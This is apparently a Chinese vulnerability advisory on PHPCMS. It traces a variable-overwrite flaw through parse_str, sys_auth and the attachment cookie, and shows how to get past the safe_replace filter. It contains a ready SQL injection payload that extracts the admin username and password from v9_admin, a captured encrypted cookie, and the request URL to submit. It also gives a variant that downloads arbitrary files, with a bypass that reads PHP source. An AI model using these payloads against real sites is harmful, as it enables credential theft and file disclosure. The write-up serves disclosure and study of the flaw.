- 发布时间:2016-09-04
- 公开时间:N/A
- 漏洞类型:变量覆盖
- 危害等级:高
- 漏洞编号:xianzhi-2016-09-44267058
- 测试版本:N/A
漏洞详情
phpcms/modules/content/down.php
public function init() {
$a_k = trim($_GET['a_k']);
if(!isset($a_k)) showmessage(L('illegal_parameters'));
$a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));
if(empty($a_k)) showmessage(L('illegal_parameters'));
unset($i,$m,$f);
parse_str($a_k);
if(isset($i)) $i = $id = intval($i);
if(!isset($m)) showmessage(L('illegal_parameters'));
if(!isset($modelid)||!isset($catid)) showmessage(L('illegal_parameters'));
if(empty($f)) showmessage(L('url_invalid'));
$allow_visitor = 1;
$MODEL = getcache('model','commons');
$tablename = $this->db->table_name = $this->db->db_tablepre.$MODEL[$modelid]['tablename'];
$this->db->table_name = $tablename.'_data';
$rs = $this->db->get_one(array('id'=>$id));
$_GET['a_k']经过sys_auth解密之后 进入parse_str函数
if(isset($i)) $i = $id = intval($i);
且当$a_k中不存在$i时 $id不会被$i覆盖
parse_str()参数可控的话 就可以任意构造$id值进入下方sql查询
$rs = $this->db->get_one(array('id'=>$id));
由于经过sys_auth()解密 所以不存在非法字符被过滤的情况
sys_auth()函数其实就是dz的authcode() 不知道key想解密或者伪造内容几乎是不可能的
所以来看看系统调用中 有没有用户可控数据进入sys_auth函数来替我们生成注入payload
phpcms/libs/classes/param.class.php 行86
public static function set_cookie($var, $value = '', $time = 0) {
$time = $time > 0 ? $time : ($value == '' ? SYS_TIME - 3600 : 0);
$s = $_SERVER['SERVER_PORT'] == '443' ? 1 : 0;
$var = pc_base::load_config('system','cookie_pre').$var;
$_COOKIE[$var] = $value;
if (is_array($value)) {
foreach($value as $k=>$v) {
setcookie($var.'['.$k.']', sys_auth($v, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);
}
} else {
setcookie($var, sys_auth($value, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);
}
}
$value参数经过sys_auth被设置到cookie
再看看有没有$value可控的地方
phpcms/modules/attachment/attachments.php 行238
public function swfupload_json() {
$arr['aid'] = intval($_GET['aid']);
$arr['src'] = safe_replace(trim($_GET['src']));
$arr['filename'] = urlencode(safe_replace($_GET['filename']));
$json_str = json_encode($arr);
$att_arr_exist = param::get_cookie('att_json');
$att_arr_exist_tmp = explode('||', $att_arr_exist);
if(is_array($att_arr_exist_tmp) && in_array($json_str, $att_arr_exist_tmp)) {
return true;
} else {
$json_str = $att_arr_exist ? $att_arr_exist.'||'.$json_str : $json_str;
param::set_cookie('att_json',$json_str);
return true;
}
}
aid被intval了 不行
filename被urlencode了 也不行
src正好 虽然经过了safe_replace函数的过滤 下面会说怎么绕过
这里可以看到 src经过json_encode之后被set_cookie()
json_encode并不会破坏我们的payload 所以只要看看怎么绕过safe_replace函数
function safe_replace($string) {
$string = str_replace('%20','',$string);
$string = str_replace('%27','',$string);
$string = str_replace('%2527','',$string);
$string = str_replace('','',$string);
$string = str_replace('"','"',$string);
$string = str_replace("'",'',$string);
$string = str_replace('"','',$string);
$string = str_replace(';','',$string);
$string = str_replace('<','<',$string);
$string = str_replace('>','>',$string);
$string = str_replace("{",'',$string);
$string = str_replace('}','',$string);
$string = str_replace('\','',$string);
return $string;
}
过滤了很多东西 基本上注入跨站都不太可能,不过init()方法中有个好东西parse_str()
parse_str()可是会自动urldecode()的噢
所以 如果我们提交id=b%'27
经过safe_replace()就会变成id=b%27
再经过parse_str() 就会初始化$id=b'
成功引入单引号
测试方法
先根据init()函数逻辑来生成payload如下
&id=%'27 and (select 1 from (select count(%'2a),concat((select concat(username,0x3a,password) from v9_admin limit 1),floor(rand(0)%'2a2))x from information_schema.tables group by x)a)#&m=1&f=haha&modelid=2&catid=7&
%'27引入单引号
%'2a引入星号(因为星号也被safe_replace函数过滤了)
前后要加上& 因为经过json_encode 前后会加上其他数据 加上&之后 id就会独立的被parse_str()初始化了
再urlencode一下 提交
记录下返回COOKIE中的xxxx_attr_json
d515pn-KiZhUqh-gIddIcgWKki9WK9vxquneqront2XWWohUsNbxrpE-PgwVYEYwEXtR7fVrfIg1P99ewxvsV6c83WF89m4bw-nV2LaKWrMXtXh3Z4GcvPQrveoF2yqTsMkAaBWfNytC4j7CgE5i2eQWsXJbxrJCwPZHl1R2bl14m5feT2_ok3fcnciVhhuvAcjdXnLlQ-3gmyENTue5-hP57S20Yj7o7FFc0m14M3WUYwPpcd1ZMvltmv6fr3a2YRlOtC0siSh8YnIqAnvULDCpH0MpB9VcMclL_zD3nd9OwLW7lFz4AF9L14QaDDutfkj1y6dBVimSIhVcdeEvi6XHt_SVATbL4HcVjd5tBn0oFFcfLBEKf-gQvrqivSn_xoHqTroT19vIgtV2F82M39Tb0Wkexhp16tuwAOf83uw1nEy99hhfAD4-2xgD1g5gKTTi3it728PE_5phVE3g2bb8O9XPIGjVGWELyjJbIDOtSN4K377I5x6nTOGN7iYtlf9eD2HTzoukaeQvoKwtt96NH1cUCd6WgUtgjpCwaDASmdmNrZfR9C-m4Ulj6ohn1q8H_PF8ESnAsO-KpRmmPC3zrMn8jHdXSu5SRWU0A9KjsoXBODx1hmk5hLQ4JHdhqvVVFeI2eZTCoc_AUiur3_3S3BdVaQN4J3HDds7gg12dL2rMquMbCOxJe5yNvYFqjqY0jQQUu0LucZkvaHfiTA
然后提交给
view.pnghttp://192.168.1.170/phpcms/index.php?m=content&c=down&a_k=刚才拿到的cookie
再来说下任意文件读取 上面的payload改一下
&i=4&s=目录&m=1&f=文件名&d=1&modelid=2&catid=7&
就可以下载任意文件 不过有个过滤
if(preg_match('/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(.|$)/i',$fileurl) ) showmessage(L('url_error'));
当然绕过也是非常轻松
比如下载index.php
只要改成index.p%'3cp
经过safe_replace变成index.p%3cp
经过parse_str()变成index.p<p
windows下就能读取到了
网友评论